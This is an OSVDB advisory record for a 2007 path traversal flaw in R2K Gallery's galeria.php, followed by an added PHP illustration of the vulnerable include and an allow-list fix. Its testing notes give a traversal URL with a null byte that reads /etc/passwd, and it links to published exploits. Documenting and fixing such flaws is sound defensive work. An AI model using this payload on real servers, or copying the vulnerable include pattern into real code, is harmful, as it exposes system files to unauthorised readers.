R2K Gallery galeria.php lang2 Variable Traversal Arbitrary File Access

2007-05-11T07:03:57
ID OSVDB:36015
Type osvdb
Reporter OSVDB
Modified 2007-05-11T07:03:57

Description

Technical Description

This vulnerability is only present when the PHP option register_globals is set to 'on'. That has not been the default setting for PHP installations since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00
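As an added illustration of the bug class this record describes (hypothetical reconstruction, not R2K Gallery's own galeria.php source, which is not reproduced here): with register_globals on, the lang2 query parameter becomes a PHP variable whose value reaches a file include, so a traversal sequence walks out of the language directory and a trailing NUL byte truncates any appended extension (PHP before 5.3.4). The hardened form reads the parameter explicitly and resolves it through an allow-list. The file names and the exact use of $lang2 are assumptions.

```php
<?php
// Added example: hypothetical reconstruction of the vulnerable pattern and its fix.
// Assumed: galeria.php picks a language file based on $lang2 and includes it.

// Vulnerable pattern: depends on register_globals to populate $lang2 from the
// request, then concatenates it straight into an include path. Untrusted path
// fragments (../ sequences, a NUL byte before the ".php" suffix) reach include().
function load_language_vulnerable()
{
    global $lang2;                       // set from the query string when register_globals=on
    include 'lang/' . $lang2 . '.php';   // request data decides which file is read
}

// Hardened pattern: take the parameter from $_GET explicitly, map it through an
// allow-list of known language files, and fall back on anything unknown. Request
// data is never concatenated into the path, so traversal and NUL-byte tricks have
// nothing to act on. Works regardless of the register_globals setting.
function load_language_safe(array $params)
{
    $allowed = array(
        'en' => 'lang/en.php',           // assumed file names
        'es' => 'lang/es.php',
    );
    $lang = isset($params['lang2']) ? (string) $params['lang2'] : 'en';
    if (!array_key_exists($lang, $allowed)) {
        $lang = 'en';                    // unknown value: use the default, do not echo it back
    }
    include $allowed[$lang];
}

// Operator check: the record states the issue only arises when register_globals
// is on, so confirming it is off is the quickest mitigation to verify.
function register_globals_enabled()
{
    return (bool) ini_get('register_globals');
}

if (register_globals_enabled()) {
    error_log('register_globals is on; disable it in php.ini');
}
load_language_safe($_GET);
```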

References:

Vendor URL: http://usuarios.lycos.es/r2kscripts/
Secunia Advisory ID: 25261
Other Advisory URL: http://0day.2600.ir/exploits/3902
Mail List Post: http://attrition.org/pipermail/vim/2007-May/001615.html
ISS X-Force ID: 34238
Generic Exploit URL: http://www.milw0rm.com/exploits/3902
FrSIRT Advisory: ADV-2007-1783
CVE: CVE-2007-2642
Bugtraq ID: 23938